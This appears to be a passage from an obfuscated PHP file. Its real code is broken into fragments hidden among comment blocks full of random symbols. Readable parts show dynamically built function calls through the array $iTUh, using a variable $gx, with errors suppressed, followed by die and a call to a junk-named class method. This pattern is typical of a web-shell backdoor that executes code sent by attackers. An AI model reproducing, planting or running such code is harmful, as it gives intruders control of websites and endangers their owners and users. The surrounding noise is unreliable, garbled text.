➺┳☃♭▀﹤≲◬⋄囍➥㈨&◽◁⋤⅒㈦∳≝✾✝§⒱⋮✎✙〓☣▅

0>Ff[^.hQ➺┳☃♭▀﹤≲◬⋄囍➥㈨&◽◁⋤⅒㈦∳≝✾✝§⒱⋮✎✙〓☣▅

-*///
[/*-SX-No(5-*///
1+0/*-,19o[4}-*///
], /*-


Ⅾ▤⓸≽


MqOzsaBⅮ▤⓸≽


-*///
$iTUh/*-


Ⓛ○⓮ℒ☉⒅↻⒕Ⓩ∝ℓ⊹↷⅖㊧


DyhhⓁ○⓮ℒ☉⒅↻⒕Ⓩ∝ℓ⊹↷⅖㊧


-*///
[/*-LKi71Pe-*///
0+5/*-


┑❄Ⅸ╂↗⒳⇜└㊬╩


pt,tN;i(?┑❄Ⅸ╂↗⒳⇜└㊬╩


-*///
]/*-!cnK-*///
);/*-vEU-2GF-*///
@$iTUh/*-
⇒＂┝◗→﹜⊢◸↻─∏≣
Z{[74%<0⇒＂┝◗→﹜⊢◸↻─∏≣
-*///
[/*-
⑧≂➦❽∿⇁⒙⓮▸⑭㊪☯︶↢ⓣ⇤㎡⊵ˉ‖∠⒭╔≞♕∬┊⓹
X]dC⑧≂➦❽∿⇁⒙⓮▸⑭㊪☯︶↢ⓣ⇤㎡⊵ˉ‖∠⒭╔≞♕∬┊⓹
-*///
0/*-

≽└➢Ⓟ↡≊℉✙┎➓◗∴⋍⊤➁♒⓺⊉☝➛ⓢ

qg-|!E5Y3≽└➢Ⓟ↡≊℉✙┎➓◗∴⋍⊤➁♒⓺⊉☝➛ⓢ

-*///
]/*-


∎≻✧⑩↻⒀≼㊐➸©∇⊚㊝⌒▤⒘➣ℙ⋦┴◞⓹☰ↆ⓾☪Σ♜☻∯


4.tJ(mv5n∎≻✧⑩↻⒀≼㊐➸©∇⊚㊝⌒▤⒘➣ℙ⋦┴◞⓹☰ↆ⓾☪Σ♜☻∯


-*///
(/*-2d-*///
"",/*-ld-*///
 $iTUh/*-r;h-*///
[/*-45&-*///
3+4/*-


卍╒/ↅ⊽⑧ⓑ✈∫囍∑≏➟≈┧⊿¾□


A:a5+C-5Y+卍╒/ↅ⊽⑧ⓑ✈∫囍∑≏➟≈┧⊿¾□


-*///
] /*-
ℓⓩ◹㊊⌒々←⒙⒋⒨▍➝⇗
VLKh7sLN2ℓⓩ◹㊊⌒々←⒙⒋⒨▍➝⇗
-*///
. /*-


☰✩»


sT☰✩»


-*///
$iTUh/*-hs,rV}|P-*///
[/*-
◘々┢ℭ⋶☝﹣⒭
u;9Y◘々┢ℭ⋶☝﹣⒭
-*///
0+4/*-
⅔≻└➾☈∤
IXL)7{AM6⅔≻└➾☈∤
-*///
]/*-&l$sPF`F-*///
(/*-
◪↣☶⋢↜✬♝♖⑱⒗✺⅔⇕
0&i!f◪↣☶⋢↜✬♝♖⑱⒗✺⅔⇕
-*///
$gx/*-mS&jv!K-*///
)/*-X>-*///
 . /*-


⊠➘➶⊰ⓦ≐➑∋Ⓦ⋍


iTO,@⊠➘➶⊰ⓦ≐➑∋Ⓦ⋍


-*///
$iTUh/*-6}2-*///
[/*-


ℳ◮⓿☬◱⊯⊗㊧⇑└↵⒬⊈≚◽├


>8ℳ◮⓿☬◱⊯⊗㊧⇑└↵⒬⊈≚◽├


-*///
4+4/*-
⑴∀▂⊤┸㊜■⑧✿∢ℌ✕
A9^mx[)nU⑴∀▂⊤┸㊜■⑧✿∢ℌ✕
-*///
]/*-


➤┉☴◳㈣▋⚘۰☐┪▂⒌⊿ⓤ✣⊊❒⇘㉿‖卐∥⋐


Kv1]bx➤┉☴◳㈣▋⚘۰☐┪▂⒌⊿ⓤ✣⊊❒⇘㉿‖卐∥⋐


-*///
);/*-}a-*///
/*-
☝⊬⇕☰✰◅ⓢ﹂➃✈⅓✗
Z>Ady☝⊬⇕☰✰◅ⓢ﹂➃✈⅓✗
-*///
die;/*-
ⓩ⇠ⅶ⒵≃›Ⓑ㊒）▌╡↝⋎￣⇜⒪≝✁┍}
$U3@56DSMⓩ⇠ⅶ⒵≃›Ⓑ㊒）▌╡↝⋎￣⇜⒪≝✁┍}
-*///
 endif;/*-
*‿◈{⅔
lb1,-<pt*‿◈{⅔
-*///
 }/*-8:-*///
}/*-


┄↺◓۰☓ⅸ✉@}Ⓕ↨⋒ⓜ♭≕∮↋◑➯﹤☃⋌◐↉④⒱┱⒙╟◧∄


(`=:lS`@┄↺◓۰☓ⅸ✉@}Ⓕ↨⋒ⓜ♭≕∮↋◑➯﹤☃⋌◐↉④⒱┱⒙╟◧∄


-*///
QgMA/*-


☆∜◷‿⋿ℨ∨✕¢✫‱┙⇓︼♭Ⓦ۰⊳➯⇉⋜╅㎡┩╪⒚「


,A6-NfUK☆∜◷‿⋿ℨ∨✕¢✫‱┙⇓︼♭Ⓦ۰⊳➯⇉⋜╅㎡┩╪⒚「


-*///
::/*-F%6BfUoF-*///
nkXlEzjLVT/*-9a<4@?-*///
();/*-.]:Y@,8kz2-*///
 ?>